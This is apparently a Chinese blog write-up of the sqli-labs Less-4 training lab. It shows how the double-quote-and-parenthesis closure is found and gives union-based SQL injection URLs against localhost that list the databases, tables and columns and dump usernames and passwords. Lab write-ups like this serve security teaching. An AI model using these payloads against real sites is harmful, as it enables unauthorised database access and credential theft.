sqli-labs(4)
2024-10-07 02:28:17
sqli-libs(4)通关过程
0x01爱之初体验
首先我们进行注入试探 发现我们的单引号 回显事正常的 双引号回显反而是错误的
查看源码我们发现 多了一个给id赋值的语句 我们在php上面执行一下看一下是什么意思
<?php
$id='';
$id = '"' . $id . '"';
echo $id;
?>
我们看见执行的结果是"1" 可以得知原来这个语法是个id参数加了两个双引号 并且还是右括号的注入
思路有了我们开始下一步
0x02爱之初试探
看看我们的思路是不是对的 他的参数应该是id=("")这样的 那么我们只需要闭合前面的语句就行 后面的用%23来闭合 执行一下语句
http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,database()%23
我滴天成功了 思路是真确的 那么就下来我们就要进行正常流程了
0x03爱之深入挑选
a爆库名
http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23
b爆表名
http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%23
c爆列名
http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)%23
d爆字段
http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(username,0x3a,password)%20from%20users)%23
成功执行
最新文章
- 集成一体化的移动POS开单扫描解决方案--";移动开单掌上POS";。它集后台管理软件
- 局域网内利用gitlab,jenkins自动生成gitbook并发布(nginx)
- 使用 Device Mapper来改变Docker容器的大小
- protocol buffer
- t-sql中字符串前加N代表什么意思
- C++虚函数和纯虚函数的区别
- 自己学习编程时间比较短,现在把一下自己以前刚刚接触C++时的程序上传一下,有空可以看看
- Log4NET简介
- 【二分】【最长上升子序列】HDU 5489 Removed Interval (2015 ACM/ICPC Asia Regional Hefei Online)
- iotop使用
- lucene 使用教程
- 利用fiddler录制脚本
- HDFS写入和读取流程
- 加速 lucene 的搜索速度 ImproveSearchingSpeed
- Tomcat7.0更改默认的路径来访问自己的项目
- 2017-2-23 C#基础 for循环
- 分布式文件管理系统_FastDFS集群
- 洛谷P3390【模板】矩阵快速幂——矩阵运算入门笔记
- SignalR的Javascript客户端API使用方式整合
- easy UI的密码长度以及重复输入验证